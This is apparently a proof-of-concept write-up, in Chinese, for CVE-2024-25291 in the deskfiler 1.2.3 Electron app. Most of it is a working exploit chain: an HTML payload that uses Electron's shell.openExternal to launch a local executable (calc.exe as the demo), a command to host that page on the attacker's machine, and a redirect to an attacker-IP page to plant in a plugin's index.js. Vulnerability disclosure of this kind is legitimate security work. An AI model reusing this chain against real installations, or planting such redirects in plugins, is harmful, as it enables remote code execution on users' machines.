
deskfiler 1.2.3 Open Redirect exploit
CVE-2024-25291 漏洞的概念验证。
deskfiler - 1.2.3 允许在应用程序中使用 Electron webview,从而导致远程代码执行。
此仓库包含一个存在漏洞的示例应用程序及其概念验证(POC)利用代码。
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
※ 如果要快速测试,请在攻击者的 PC 上使用以下代码创建服务器。
$ python -m http.server 80
注意: ※ 此时,假设该插件是由攻击者生成的插件,并且只是一个添加了代码以允许攻击者服务器访问的正常插件。为简单测试选择了 BareBone。

之后,在 BareBone 文件夹路径下的 index.js 文件中添加以下代码。
window.location='http://[attacker_ip]/hack.html'


在此 PoC 中,我们使用了插件;但我们认为,通过其他攻击向量,也可以独立实现远程代码执行(RCE)。此外,如果存在存储型 XSS、反射型 XSS 等服务器端漏洞,RCE 同样被认为是可以实现的。